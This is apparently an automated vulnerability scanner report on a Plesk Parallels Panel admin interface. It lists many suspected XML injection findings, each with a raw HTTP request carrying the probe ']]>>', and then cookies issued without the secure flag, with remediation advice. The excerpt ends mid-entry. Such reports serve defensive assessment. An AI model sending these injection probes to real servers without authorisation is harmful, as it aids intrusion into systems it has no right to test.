GET /skins]]>>/default/plesk/css/top/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:04 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/layout.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/top/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:06 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/layout.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/top/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:08 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/layout.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/top/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:10 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/layout.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/top]]>>/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:12 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/layout.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/top/layout.css]]>>?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/?start_page=%2Fadmin%2Fhome%2Fadmin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:35 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/account/create-subscription
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/account/create-subscription?redirectUrl=%2F HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:09 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/account/power-mode-logout
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/account/power-mode-logout HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription?redirectUrl=%2F Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:38 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/admin-home
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/admin-home HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/?start_page=%2Fadmin%2Fhome%2Fadmin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/admin-home/installed-applications/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/auth/logout
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/auth/logout HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:20:05 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/help/redirect/controller-name/account/action-name/create-subscription HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:20:19 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/help/redirect/controller-name/admin-home/action-name/index HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:20:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/help/redirect/controller-name/subscription/action-name/logout HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:20:19 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/scripts/admin-home.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/scripts/admin-home.js?1301570628 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:00:16 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/scripts/smb.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/scripts/smb.js?1301570628 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription?redirectUrl=%2F Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:38 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/smb/user/list/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /smb]]>>/user/list/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:38 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/top.php3
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /top.php3]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:26:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
4. SSL cookie without secure flag setpreviousnext There are 62 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
4.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3previousnext
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/login_up.php3
Issue detail
The following cookies were issued by the application and do not have the secure flag set:
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /login_up.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive Content-Length: 55 Cache-Control: max-age=0 Origin: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usagepreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/app/usage
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/app/usage HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:27:17 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:27:17 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:27:17 GMT Server: sw-cp-server Content-Length: 8399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/edit/id/5
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
